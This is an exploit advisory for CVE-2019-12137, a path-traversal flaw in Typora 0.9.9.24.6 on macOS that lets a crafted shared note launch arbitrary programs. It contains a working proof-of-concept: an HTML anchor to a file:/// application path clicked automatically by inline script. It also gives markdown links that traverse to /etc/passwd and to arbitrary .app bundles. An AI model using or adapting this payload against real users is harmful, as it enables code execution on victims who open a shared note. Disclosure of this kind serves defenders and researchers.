# ExploitTitle:Code execution via path traversal
# Date:17-05-2019
# ExploitAuthor:DhirajMishra
# VendorHomepage: http://typora.io
# SoftwareLink: https://typora.io/download/Typora.dmg
# Version:0.9.9.24.6
# Tested on: macOS Mojave v10.14.4
# CVE:CVE-2019-12137
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2019-12137
# https://github.com/typora/typora-issues/issues/2505Summary:Typora0.9.9.24.6 on macOS allows directory traversal,for the execution of
arbitrary programs, via a file:/// or ../ substring in a shared note via
abusing URI schemes.Technical observation:A crafted URI can be used in a note to perform this attack using file:///
has an argument or by traversing to any directory like(../../../../something.app).Since,Typro also has a feature of sharing notes,in such case attacker
could leverage this vulnerability and send crafted notes to the
victim to perform any further attack.Simple exploit code would be:<body><a href="file:\\\Applications\Calculator.app" id=inputzero><img src="https://www.exploit-db.com/exploits/46932/someimage.jpeg" alt="inputzero" width="104" height="142"></a><script>(function download(){
document.getElementById('inputzero').click();})()</script></body>And alt would be:
```
[HelloWorld](file:///../../../../etc/passwd)[HelloWorld](file:///../../../../something.app)
```